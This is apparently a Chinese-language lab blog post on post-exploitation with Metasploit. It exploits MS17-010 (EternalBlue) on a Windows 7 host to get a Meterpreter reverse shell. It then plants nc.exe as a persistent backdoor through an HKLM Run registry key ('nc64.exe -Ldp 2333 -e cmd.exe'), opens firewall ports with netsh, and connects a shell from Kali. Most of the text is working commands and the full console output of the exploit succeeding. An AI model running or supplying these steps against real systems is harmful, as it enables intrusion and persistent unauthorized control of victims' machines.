后渗透 | nc留后门
命令:
- 同网段主机探测:nmap -Pn 192.168.171.129/24
- MSF先得到一个session
- search ms17-010
- 用于验证是否存在漏洞
- auxiliary/admin/smb/ms17_010_command
- auxiliary/scanner/smb/smb_ms17_010
- 用于验证是否存在漏洞
- use exploit/windows/smb/ms17_010_eternalblue
- set payload windows/x64/meterpreter/reverse_tcp
- show options
- set RHOSTS 192.168.171.142
- run
- search ms17-010
- nc后门上传
- upload /root/nc.exe c:\\windows\\system32 #“\\”避开过滤
- 修改注册表
- reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
- 查询键值:查看目标机中自动启动的软件有哪些
- reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc64 -d 'C:\Users\Wind7\Desktop\nc64.exe -Ldp 2333 -e cmd.exe'
- 添加nc键值
- -v:指定进程名
- -d:程序启动路径
- -Ldp:木马反弹链接的端口
- reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc64
- 查看指定进程(nc64)的内容
- reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
- 添加访问端口是要先关闭防火墙才能添加成功
- shell或者execute -f cmd -I -H //生成shell
- cmd下: netsh firewall show opmode //查看防火墙状态。
- netsh firewall add portopening TCP 444 "textx" ENABLE ALL
- netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
- netsh firewall add portopening TCP 9080 "QQ1" ENABLE ALL
- 将目标机重启使其生效,允许刚刚的木马运行
- Kali开启nc获得反弹shell
- nc 192.168.56.12 9080
实验结果:
Executing 鈥渟udo msfdb init && msfconsole鈥� [i] Database already started [i] The database appears to be already configured, skipping initialization ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## https://metasploit.com =[ metasploit v5.0.93-dev ] + -- --=[ 2029 exploits - 1103 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Use help <command> to learn more about any command [*] Starting persistent handler(s)... msf5 > ○ use exploit/windows/smb/ms17_010_eternalblue [-] Unknown command: ○. msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.171.142 RHOSTS => 192.168.171.142 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.171.129:4444 [*] 192.168.171.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [*] 192.168.171.142:445 - Scanned 1 of 1 hosts (100% complete) [-] 192.168.171.142:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploit completed, but no session was created. msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.171.129:4444 [*] 192.168.171.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.171.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit) [*] 192.168.171.142:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.171.142:445 - Connecting to target for exploitation. [+] 192.168.171.142:445 - Connection established for exploitation. [+] 192.168.171.142:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.171.142:445 - CORE raw buffer dump (40 bytes) [*] 192.168.171.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B [*] 192.168.171.142:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic [*] 192.168.171.142:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1 [+] 192.168.171.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.171.142:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.171.142:445 - Sending all but last fragment of exploit packet [*] 192.168.171.142:445 - Starting non-paged pool grooming [+] 192.168.171.142:445 - Sending SMBv2 buffers [+] 192.168.171.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.171.142:445 - Sending final SMBv2 buffers. [*] 192.168.171.142:445 - Sending last fragment of exploit packet! [*] 192.168.171.142:445 - Receiving response from exploit packet [+] 192.168.171.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.171.142:445 - Sending egg to corrupted connection. [*] 192.168.171.142:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 192.168.171.142 [*] Meterpreter session 1 opened (192.168.171.129:4444 -> 192.168.171.142:49159) at 2020-06-23 13:04:01 +0800 [+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.171.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \runrpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\ Enumerating: HKLM\software\microsoft\windows\currentversion\run Values (3): VMware VM3DService Process VMware User Process nc64 \\run -v nc64eg queryval -k HKLM\\software\\microsoft\\windows\\currentversion Key: HKLM\software\microsoft\windows\currentversion\run Name: nc64 Type: REG_SZ Data: C:\Users\Wind7\Desktop\nc64.exe -Ldp 2333 -e cmd.exe meterpreter >
后门留成功了
root@brother:~# nc 192.168.171.142 2333 Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Windows\system32>
浙公网安备 33010602011771号